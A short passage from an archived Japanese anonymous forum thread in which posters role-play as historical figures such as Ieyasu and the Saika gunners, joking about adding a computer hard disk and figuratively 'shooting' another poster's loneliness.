撃つ!? 撃つとはどうしてかの?

ぱそこんとやらのはーどですくとやらを増設しようかの…

435 :雑賀衆:04/05/10 13:50
いや、家康様。
>>432を他のスレでも見かけましてな。
その書き込みから猛烈な狂気を察しやした。
ただ、その狂気の源はかの者の孤独ではなかろかと。
あっしが撃ちたいのはその源ですがな。

59 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)